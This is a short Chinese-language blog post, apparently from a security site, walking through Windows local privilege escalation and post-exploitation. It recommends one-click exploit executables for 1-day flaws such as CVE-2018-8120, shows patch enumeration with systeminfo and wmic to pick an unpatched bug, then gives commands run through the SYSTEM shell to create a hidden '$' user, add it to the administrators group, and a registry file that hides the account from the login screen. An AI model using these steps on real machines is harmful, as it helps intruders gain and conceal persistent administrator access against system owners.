Windows下的本地提權漏洞梳理及後滲透簡析

1.github網址,截圖,不同系統版本對應的漏洞

2.後滲透階段

 

壹   通過1day漏洞進行Windows本地提權

分享一個github鏈接:Windows提權漏洞整理

裏面大部分是基於x64系統的漏洞直接利用程序exe,傻瓜式操作,一鍵提權

C:\Users\Knownsec.zyg>
C:\Users\Knownsec.zyg>xxxx.exe "whoami"
C:\Users\Knownsec.zyg>

粘一個大佬分享的截圖:

提權前若是能夠查看該系統的補丁那是更美妙的事情了:

C:\Users\Knownsec.zyg>systeminfo
C:\Users\Knownsec.zyg>wmic qfe list full /format:htable >C:\Users\Knownsec.zyg\Desktop\hotfixes.htm

這個命令會導出一個html,裏面存放了每一個補丁安裝的時間,由此可以推測該系統最後一個補丁的時間,查詢1day提權漏洞

若是已經發現合適的漏洞並對其進行利用的話,成功效果圖如下:

這便是利用CVE-2018-8120的x86版腳本直接提權,“whoami”後返回當前用戶顯示已經爲“system”

 

 

 

 

貳   後滲透階段

現在我們已經有了一個基於system超級用戶的權限窗口,但是這個窗口功能過於單一,我們可控的權限仍然沒有提升,可以通過這個窗口,進行下一步的提權後滲透:

思路:基於system的dos創建隱藏用戶,將隱藏用戶加入administrators用戶組以獲得管理員權限

C:\Users\Knownsec.zyg>xxxx.exe "net user"                   #查看當前所有用戶
C:\Users\Knownsec.zyg>xxxx.exe "net user 用戶名$ 密碼 /add"  #添加該用戶
C:\Users\Knownsec.zyg>xxxx.exe "net localgroup administrastors username /add"              
                                                            #將該用戶拉入管理員組以獲得管理員權限
C:\Users\Knownsec.zyg>xxxx.exe "net user"                   #查看用戶發現沒有該隱藏用戶

或者再:

用記事本建個文本文件,輸入以下內容(用戶名自行修改),另存爲.reg註冊表文件後雙擊導入即可:

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList]
"隱藏用戶名1"=dword:00000000
"隱藏用戶名2"=dword:00000000

二合一食用效果更佳

 

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章